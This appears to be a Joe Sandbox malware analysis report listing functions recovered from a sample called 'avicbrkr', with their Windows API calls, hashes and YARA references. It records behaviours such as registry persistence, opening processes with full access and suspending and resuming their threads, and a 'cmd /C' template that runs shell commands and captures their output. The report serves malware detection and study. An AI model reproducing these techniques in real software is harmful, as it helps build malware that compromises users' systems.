                        • Part of subcall function 0038AC59: RtlLeaveCriticalSection.NTDLL(00000000), ref: 0038ACD6
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$memcpy$AllocateFree$CriticalLeaveSectionlstrlenmemset
                      • String ID:
                      • API String ID: 1966814898-0
                      • Opcode ID: 4a8c91aa00def1eac14c91ce31ec30b71adbdc0a52b17da034650e4a3d0cbd1f
                      • Instruction ID: a01e23d47855f1bd751e2991b1e88062d731de50e925aba8507e5b00eb5394e0
                      • Opcode Fuzzy Hash: 4a8c91aa00def1eac14c91ce31ec30b71adbdc0a52b17da034650e4a3d0cbd1f
                      • Instruction Fuzzy Hash: 6B41A131900218AFDB339FA4DC49BAE7BA9FF04310F118466F908AB260DB799D50DB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038C7BC, Relevance: 7.6, APIs: 5, Instructions: 125stringthreadCOMMON
                      Download Yara Rule
                      APIs
                      • GetCurrentThreadId.KERNEL32 ref: 0038C7FD
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038C898
                      • _strupr.NTDLL ref: 0038C8C3
                      • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 0038C8D0
                      • CloseHandle.KERNEL32(00000000), ref: 0038C8EA
                        • Part of subcall function 0038C32E: memset.NTDLL ref: 0038C366
                        • Part of subcall function 0038C32E: memset.NTDLL ref: 0038C375
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseCurrentHandleOpenProcessThread_struprlstrlen
                      • String ID:
                      • API String ID: 3929142895-0
                      • Opcode ID: 84ad982b8974fb4ded86885d6e293236fe5c70ecee9f716a8adf7875ed81a770
                      • Instruction ID: 221cbd90cc5630d3f53df27b3a0191f538261d01e0e506357f80d77d4c00146d
                      • Opcode Fuzzy Hash: 84ad982b8974fb4ded86885d6e293236fe5c70ecee9f716a8adf7875ed81a770
                      • Instruction Fuzzy Hash: 84412C71950318EFDF22AFA4CC49BDEBBB8EF48701F1150A6F600A6190D7759A40DFA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003747AC, Relevance: 7.6, APIs: 5, Instructions: 121memoryregistrysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00373DA8: RegCreateKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DBD
                        • Part of subcall function 00373DA8: RegOpenKeyA.ADVAPI32(80000001,0039D244,?), ref: 00373DCA
                        • Part of subcall function 00373DA8: lstrlen.KERNEL32(0039D244,00000000,00000000,00000000,?,?,?,00373E29,00000000,00000000,00000000,00000000,?,?,?,00374EBE), ref: 00373DEB
                      • HeapFree.KERNEL32(00000000,0037D9D1), ref: 0037486B
                      • WaitForSingleObject.KERNEL32(00000000), ref: 003748CF
                      • HeapFree.KERNEL32(00000000,0037D9D1), ref: 003748F8
                      • HeapFree.KERNEL32(00000000,0037B7D2), ref: 00374908
                      • RegCloseKey.ADVAPI32(00000001,?,00000001,0037B7D2,00000000,00000000,?,0037D9D1), ref: 00374911
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: FreeHeap$CloseCreateObjectOpenSingleWaitlstrlen
                      • String ID:
                      • API String ID: 55024742-0
                      • Opcode ID: 02a147f4d9b80554124864814a5254177684d8a55c39fabb45ad39c6a3d1d269
                      • Instruction ID: 33cd739108879364c71744820293af4dc53ca776cb22d799515684b3fdf43f85
                      • Opcode Fuzzy Hash: 02a147f4d9b80554124864814a5254177684d8a55c39fabb45ad39c6a3d1d269
                      • Instruction Fuzzy Hash: DC41A5B5D0011DFFDF129F94DD858EEBBB9FB08304F11846AE515A2220D33A5A54EB51
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00377B19, Relevance: 7.6, APIs: 5, Instructions: 107memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                        • Part of subcall function 00377A7F: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 00377AA5
                        • Part of subcall function 00377A7F: HeapFree.KERNEL32(00000000,?,00000000), ref: 00377B09
                      • lstrlen.KERNEL32(00000000,0039ED87,00000000,0039ED75,00000000,0039ED61,00000000,0039EE04,00000000,0039EDF9,00000000,0039ED51,00000000,00002334), ref: 00377BCB
                      • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 00377BE0
                      • wsprintfA.USER32 ref: 00377BF5
                        • Part of subcall function 003776C1: memset.NTDLL ref: 003776D9
                        • Part of subcall function 003776C1: lstrlenW.KERNEL32(00000000,00000000,00000000,0039CD50,00000000,cmd /C "%s> %s1"), ref: 00377712
                        • Part of subcall function 003776C1: wcstombs.NTDLL ref: 0037771C
                        • Part of subcall function 003776C1: CreateProcessA.KERNEL32(00000000,00377AD2,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 00377750
                        • Part of subcall function 003776C1: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00377771
                        • Part of subcall function 003776C1: GetExitCodeProcess.KERNEL32(?,?), ref: 0037778E
                        • Part of subcall function 003776C1: GetLastError.KERNEL32 ref: 003777A6
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377C0F
                        • Part of subcall function 00377905: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00377955
                        • Part of subcall function 00377905: GetLastError.KERNEL32(?,00000000,00377C1F), ref: 00377986
                        • Part of subcall function 00377905: HeapFree.KERNEL32(00000000,00000000), ref: 00377998
                        • Part of subcall function 00377905: HeapFree.KERNEL32(00000000,00377C1F), ref: 003779AD
                      • HeapFree.KERNEL32(00000000,00000000), ref: 00377C39
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$Free$Allocate$ErrorFileLastProcessTimelstrlen$CodeCreateCurrentExitMultipleNameObjectsSystemTempThreadWaitlstrcpymemsetwcstombswsprintf
                      • String ID:
                      • API String ID: 3059783489-0
                      • Opcode ID: c255ce019d6c99e06b2895e9b0926552e7217e9060ab23de353483cd47bd1111
                      • Instruction ID: e0d0edb79300ea84453b29703dd1926659ff95f71c2cf3622d598cb4ae010333
                      • Opcode Fuzzy Hash: c255ce019d6c99e06b2895e9b0926552e7217e9060ab23de353483cd47bd1111
                      • Instruction Fuzzy Hash: 7A21F63394966327CA3376745C8AE6FA95DCB89F50F0B8129FD08BB2A2DA4D8C0141E1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00374557, Relevance: 7.6, APIs: 5, Instructions: 98timememoryCOMMON
                      Download Yara Rule
                      APIs
                      • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                      • CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                      • GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00373E0D: RegQueryValueExA.KERNEL32(00000000,0037D7B1,00000000,0037D7B1,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00374EBE,0039E1C6), ref: 00373E45
                        • Part of subcall function 00373E0D: RtlAllocateHeap.NTDLL(00000000,?), ref: 00373E59
                        • Part of subcall function 00373E0D: HeapFree.KERNEL32(00000000,?), ref: 00373E8F
                        • Part of subcall function 00373E0D: RegCloseKey.ADVAPI32(00000000,?,?,?,00374EBE,0039E1C6,0037D7B1,00000000,00000000,00000000,00000000,?,?,?,0037D7B1,00000000), ref: 00373E9D
                      • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                      • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                        • Part of subcall function 00374505: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00374512
                        • Part of subcall function 00374505: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 0037454C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$HeapTimerWaitable$FileFreeSystem$AllocateCloseCreateErrorLastOpenQueryValue
                      • String ID:
                      • API String ID: 3396801686-0
                      • Opcode ID: 0e2165f9071011c0c9a8f9d8786e39c9c6282325ceab009231b9078d3f82c40f
                      • Instruction ID: 8d58f9fcaf5c3f3fb95c734e43dfd2c0784a001001becce4fac7781179053436
                      • Opcode Fuzzy Hash: 0e2165f9071011c0c9a8f9d8786e39c9c6282325ceab009231b9078d3f82c40f
                      • Instruction Fuzzy Hash: FC314A71500229BBCF339F55CC89CAF7F79EF467A1F118416F81996160D739AA50CBA0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037A1FC, Relevance: 7.6, APIs: 5, Instructions: 95memorystringCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0037A27E
                      • lstrcpy.KERNEL32(00000000,0039E3F1), ref: 0037A290
                      • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0037A29D
                      • lstrlen.KERNEL32(0039E3F1,?,?,?,?,?,00000000,00000000,?), ref: 0037A2AF
                        • Part of subcall function 0037AA37: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0037AA58
                        • Part of subcall function 0037AA37: wsprintfA.USER32 ref: 0037AA6D
                        • Part of subcall function 0037AA37: RegCreateKeyA.ADVAPI32(80000001,0039D500,00000000), ref: 0037AA85
                        • Part of subcall function 0037AA37: RegCloseKey.ADVAPI32(?), ref: 0037AAAD
                        • Part of subcall function 0037AA37: HeapFree.KERNEL32(00000000,00000000), ref: 0037AABC
                        • Part of subcall function 0037B206: RtlAllocateHeap.NTDLL(00000000,?), ref: 0037B285
                        • Part of subcall function 0037B206: wsprintfA.USER32 ref: 0037B33D
                        • Part of subcall function 0037B206: memcpy.NTDLL(00000000,?,?), ref: 0037B382
                        • Part of subcall function 0037B206: InterlockedExchange.KERNEL32(0039D22C,00000000), ref: 0037B3A0
                        • Part of subcall function 0037B206: HeapFree.KERNEL32(00000000,00000000), ref: 0037B3E3
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0037A2E0
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$AllocateFree$wsprintf$CloseCreateExchangeInterlockedlstrcpylstrcpynlstrlenmemcpy
                      • String ID:
                      • API String ID: 1433411673-0
                      • Opcode ID: 8766cec68f430f9d244b3780dae8afcd3194361531edb7e5dd64adc8c43a5afa
                      • Instruction ID: cffbe5fe90af6453c284ecb74c28bca427fc5d7cb743c12ad579f3f95d274e82
                      • Opcode Fuzzy Hash: 8766cec68f430f9d244b3780dae8afcd3194361531edb7e5dd64adc8c43a5afa
                      • Instruction Fuzzy Hash: CC319E32900209FFDB22DF95DC89EEF7BB8EF84350F008415F81892251E77A9951CBA1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037469E, Relevance: 7.6, APIs: 5, Instructions: 90synchronizationCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00374660: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 0037466C
                        • Part of subcall function 00374660: SetLastError.KERNEL32(000000B7,?,003746B1), ref: 0037467D
                        • Part of subcall function 00374660: CreateMutexA.KERNEL32(0039D2D8,00000000,?,?,003746B1), ref: 00374690
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 003746D1
                      • CloseHandle.KERNEL32(00000000), ref: 0037478F
                        • Part of subcall function 00374557: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0037456E
                        • Part of subcall function 00374557: CreateWaitableTimerA.KERNEL32(0039D2D8,?,?), ref: 0037458D
                        • Part of subcall function 00374557: GetLastError.KERNEL32 ref: 0037459D
                        • Part of subcall function 00374557: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 003745E4
                        • Part of subcall function 00374557: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 00374618
                      • GetLastError.KERNEL32 ref: 00374778
                      • ReleaseMutex.KERNEL32(00000000), ref: 00374781
                      • GetLastError.KERNEL32 ref: 0037479C
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorLast$Mutex$CreateOpenTimeTimerWaitable$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                      • String ID:
                      • API String ID: 1572077517-0
                      • Opcode ID: 5ef35cfe918a337493fb4831b7d1f18633d696fffdfeaab875b919e502c98966
                      • Instruction ID: 2ec9f889737d558d72911ad489b15a3f08d0c8a45bded167565f64f3221b53ab
                      • Opcode Fuzzy Hash: 5ef35cfe918a337493fb4831b7d1f18633d696fffdfeaab875b919e502c98966
                      • Instruction Fuzzy Hash: C231B1752012549FCB27AF34DC86D7E7BB9EB46710F128526F819DB3A0D736A940CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0037B087, Relevance: 7.6, APIs: 5, Instructions: 85memorystringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00375A17: RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375A1F
                        • Part of subcall function 00375A17: RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375A34
                        • Part of subcall function 00375A17: InterlockedIncrement.KERNEL32(0000001C), ref: 00375A4D
                      • RtlAllocateHeap.NTDLL(00000000,?,0039F241), ref: 0037B0B7
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B0C8
                        • Part of subcall function 003759AC: InterlockedDecrement.KERNEL32(0000001C), ref: 003759B0
                      • lstrcmpi.KERNEL32(00000002,?), ref: 0037B10E
                      • memcpy.NTDLL(00000000,?,?), ref: 0037B122
                      • HeapFree.KERNEL32(00000000,00000000,0039F241), ref: 0037B161
                        • Part of subcall function 00377D93: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00377DA7
                        • Part of subcall function 00377D93: memcpy.NTDLL(00000000,00377EC2,?,?,00000008,?,00377EC2,00000000,00000000,?), ref: 00377DD0
                        • Part of subcall function 00377D93: RegCloseKey.ADVAPI32(?,?,00377EC2,00000000,00000000,?,?,?,?,?,?,?,?,00000008,00377A4C,00000000), ref: 00377E22
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memcpy$CriticalHeapInterlockedSection$AllocateCloseCreateDecrementEnterFreeIncrementLeavelstrcmpi
                      • String ID:
                      • API String ID: 4195611527-0
                      • Opcode ID: c7f943e34469dbfc9b65dcd8d5eefa3d6d08166959da3e20606a2cd858711d60
                      • Instruction ID: 9f663d2f12c399ca197ed0df154ebff8933862308b8bc598d3922d3295d545dc
                      • Opcode Fuzzy Hash: c7f943e34469dbfc9b65dcd8d5eefa3d6d08166959da3e20606a2cd858711d60
                      • Instruction Fuzzy Hash: 0C218132900218BFDF239FA49C85B9EBB79FF04754F158029F909A6250E77A9D44CB90
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00375C22, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0038ECF0: lstrlen.KERNEL32(0039D47C,0039D418,00000000,?,0038F79B,0039D47C,0039706C,00000000,00397050,0039D424,0039D424,00000000,0038F2FB,00000000,?,?), ref: 0038ECFC
                      • RtlEnterCriticalSection.NTDLL(0039D508), ref: 00375C4C
                      • RtlLeaveCriticalSection.NTDLL(0039D508), ref: 00375C5F
                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00375C70
                      • RtlAllocateHeap.NTDLL(00000000,0039D524,?), ref: 00375CDB
                      • InterlockedIncrement.KERNEL32(0039D51C), ref: 00375CF2
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                      • String ID:
                      • API String ID: 3915436794-0
                      • Opcode ID: 42940c7c3cb9b470b41d52883caf6ee6cc06e10e691b1d96c3b7617444d318ae
                      • Instruction ID: 8a827f423786d4766482212a7913de1855239618460252a9e62bed64fa15b157
                      • Opcode Fuzzy Hash: 42940c7c3cb9b470b41d52883caf6ee6cc06e10e691b1d96c3b7617444d318ae
                      • Instruction Fuzzy Hash: 3031BC32505B069FCB37DF18D949A2ABBE8FB45324F02852AF95983260D775E811CBD1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 006323B4, Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00633223: OpenProcess.KERNEL32(00000400,00000000,00637614,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063323E
                        • Part of subcall function 00633223: IsWow64Process.KERNEL32(00637624,?,0063618C,0000000C,?,?,00631718,00000000,?,00637614), ref: 0063324F
                        • Part of subcall function 00633223: CloseHandle.KERNEL32(00637624), ref: 00633262
                      • OpenProcess.KERNEL32(001F0FFF,00000000,0063155F,0063155F,C000009A,00637614,00000000,?,?,0063155F,?,00000000,?,00637614), ref: 006323DF
                      • GetLastError.KERNEL32(?,?,0063155F,?,00000000,?,00637614), ref: 0063245B
                        • Part of subcall function 0063225F: memset.NTDLL ref: 00632282
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?,00000000,0063244E,CCCCFEEB,00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063230D
                        • Part of subcall function 0063225F: WaitForSingleObject.KERNEL32(00000064), ref: 0063231B
                        • Part of subcall function 0063225F: SuspendThread.KERNEL32(?), ref: 0063232E
                        • Part of subcall function 0063225F: GetLastError.KERNEL32(00000000,0063244E,0063244E,00000004,?,00000000,00000000,0063605C,00000000), ref: 0063239A
                        • Part of subcall function 0063225F: ResumeThread.KERNEL32(?), ref: 006323A5
                      • CloseHandle.KERNEL32(0063155F), ref: 00632453
                      • CloseHandle.KERNEL32(?), ref: 0063246D
                      • GetLastError.KERNEL32(?,?,0063155F,?,00000000,?,00637614), ref: 00632475
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: CloseErrorHandleLastProcessThread$OpenResume$ObjectSingleSuspendWaitWow64memset
                      • String ID:
                      • API String ID: 1160281849-0
                      • Opcode ID: e8b0d460e7ff38f009efd7100d20006a8911a2eef4d6570bd19fb08769ee5949
                      • Instruction ID: c71d4c4306516f780619c12968f29f5d7299ac5de40d6174e0b305876128d174
                      • Opcode Fuzzy Hash: e8b0d460e7ff38f009efd7100d20006a8911a2eef4d6570bd19fb08769ee5949
                      • Instruction Fuzzy Hash: 2E21AE7290412ABFDB215FB4DC998AEBBF7EB09354F018435FA12A3261D7318D058BE0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00386CC7, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 76COMMON
                      Download Yara Rule
                      APIs
                      • memset.NTDLL ref: 00386D12
                      • memset.NTDLL ref: 00386D29
                      • memset.NTDLL ref: 00386D40
                        • Part of subcall function 003836DE: CloseHandle.KERNEL32(00000000), ref: 003836E9
                        • Part of subcall function 003836DE: memset.NTDLL ref: 003836F8
                      • memset.NTDLL ref: 00386D58
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseHandle
                      • String ID: m8
                      • API String ID: 1628094390-673699531
                      • Opcode ID: 5860f9df61d59d31d876956ad38ac41d829acf3e3b2c1d4f7fab8a174386d2f6
                      • Instruction ID: d0332866b5d932bebf6c9ebac2262cfbfd8f86d48b36564e01de87cd9fe1452e
                      • Opcode Fuzzy Hash: 5860f9df61d59d31d876956ad38ac41d829acf3e3b2c1d4f7fab8a174386d2f6
                      • Instruction Fuzzy Hash: 0221D272600A09BBCB22AF61DC86D667B39FF09344B060558F94586C21D732F8B6DFD1
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 0038C5CC, Relevance: 7.6, APIs: 5, Instructions: 76stringCOMMON
                      Download Yara Rule
                      APIs
                      • GlobalFix.KERNEL32(00000000), ref: 0038C625
                      • lstrlenW.KERNEL32(00000000), ref: 0038C632
                      • memset.NTDLL ref: 0038C642
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • lstrcpyW.KERNEL32(00000000,00000000), ref: 0038C680
                        • Part of subcall function 0038BD86: OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 0038BDE0
                        • Part of subcall function 0038BD86: CloseHandle.KERNEL32(00000000), ref: 0038BDFE
                        • Part of subcall function 0038BD86: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0038BE66
                        • Part of subcall function 0038BD86: GetSystemTimeAsFileTime.KERNEL32(00000008,00000014), ref: 0038BEE5
                      • GlobalUnWire.KERNEL32(?), ref: 0038C692
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Time$FileGlobalSystem$AllocateCloseHandleHeapOpenProcessWirelstrcpylstrlenmemset
                      • String ID:
                      • API String ID: 4029449214-0
                      • Opcode ID: ce50484d1af07a6a4139ba558379150fe67d90e72d17efeb194c29dd1ec52c0c
                      • Instruction ID: 006a2bacc0dc301c018862c7cb6cce56aecaad2d1f86eba6d66c185941fb0d11
                      • Opcode Fuzzy Hash: ce50484d1af07a6a4139ba558379150fe67d90e72d17efeb194c29dd1ec52c0c
                      • Instruction Fuzzy Hash: A8214172920309BBDB126FB4EC49BDEBBBCBF08741F052166F501E6190EB75D9048B64
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00386F0A, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileW.KERNEL32(0039F998,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00386F28
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,003913E1,00000000,0039F998,00000000), ref: 00386F38
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • ReadFile.KERNEL32(0039F998,00000000,00000000,00000000,00000000), ref: 00386F64
                      • GetLastError.KERNEL32(?,?,003913E1,00000000,0039F998,00000000), ref: 00386F89
                      • CloseHandle.KERNEL32(000000FF), ref: 00386F9A
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: File$Heap$AllocateCloseCreateErrorFreeHandleLastReadSize
                      • String ID:
                      • API String ID: 3493789272-0
                      • Opcode ID: 8b673a3c0539bfc970e6ab2fd97e810adecd6d079e0934fdd6b7cbadd0e798c8
                      • Instruction ID: 0c36f0b3ca8a41f604c37973a33534b96d2c4c68fd03cac9e1a4097d08eb302b
                      • Opcode Fuzzy Hash: 8b673a3c0539bfc970e6ab2fd97e810adecd6d079e0934fdd6b7cbadd0e798c8
                      • Instruction Fuzzy Hash: 81110672104314BFDB237F68EC89AAE7B6DDB04764F1246AAFA1597290C631DD4087A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 00378764, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON
                      Download Yara Rule
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 00378792
                      • GetLastError.KERNEL32 ref: 003787B5
                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003787C8
                      • GetLastError.KERNEL32 ref: 003787D3
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037881B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
                      • String ID:
                      • API String ID: 1671499436-0
                      • Opcode ID: 1f93507cd19363385db148d11d0d74c53f383f0500bca0eaae82f9ea0b6cce20
                      • Instruction ID: dfe5813abf18ba0bb7923235d07824525087f04a96afa087b1da9a95d2f1cab6
                      • Opcode Fuzzy Hash: 1f93507cd19363385db148d11d0d74c53f383f0500bca0eaae82f9ea0b6cce20
                      • Instruction Fuzzy Hash: B021AE70540244FBEB338B55DC8DB5A7BBDFB00314FB08429E146965E0CBBA9D84DB11
                      Uniqueness

                      Uniqueness Score: -1,00%

                      Function 003711B3, Relevance: 7.6, APIs: 5, Instructions: 65filememoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00387665: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,003711C5,000004D2), ref: 0038769D
                        • Part of subcall function 00387665: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,003711C5,000004D2), ref: 003876A9
                        • Part of subcall function 00387665: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 003876B7
                        • Part of subcall function 00387665: lstrcpy.KERNEL32(00000000), ref: 003876D2
                      • DeleteFileA.KERNEL32(00000000,000004D2), ref: 003711D6
                      • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 003711DF
                      • GetLastError.KERNEL32 ref: 003711E9
                        • Part of subcall function 00371000: lstrcpy.KERNEL32(00000000,?), ref: 00371046
                        • Part of subcall function 00371000: RtlAllocateHeap.NTDLL(00000000,?), ref: 00371115
                        • Part of subcall function 00371000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00371145
                        • Part of subcall function 00371000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0037115E
                        • Part of subcall function 00371000: CloseHandle.KERNEL32(00000000), ref: 00371168
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,?), ref: 00371178
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,00000000), ref: 00371193
                        • Part of subcall function 00371000: HeapFree.KERNEL32(00000000,?), ref: 003711A3
                        • Part of subcall function 003779BC: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 003779FD
                        • Part of subcall function 003779BC: lstrlen.KERNEL32(00000000,?,00000000,?,?,00371255,00000000,00000000,00000004), ref: 00377A15
                        • Part of subcall function 003779BC: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00377A29
                        • Part of subcall function 003779BC: mbstowcs.NTDLL ref: 00377A39
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00377A57
                        • Part of subcall function 003779BC: CloseHandle.KERNEL32(?), ref: 00377A61
                        • Part of subcall function 003779BC: HeapFree.KERNEL32(00000000,00000000,?), ref: 00377A70
                      • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 0037125E
                      • HeapFree.KERNEL32(00000000,00000000), ref: 0037126D
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heap$FileFree$Create$AllocateCloseDirectoryHandleTimelstrcpy$CurrentDeleteErrorLastNameRemoveSystemTempThreadWritelstrlenmbstowcs
                      • String ID:
                      • API String ID: 2670931601-0
